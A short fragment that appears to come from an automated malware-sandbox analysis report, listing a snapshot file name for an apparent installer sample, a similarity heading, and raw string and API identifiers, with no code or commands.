                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 00K$@0K$P0K$`0K
                                      • API String ID: 0-1070766156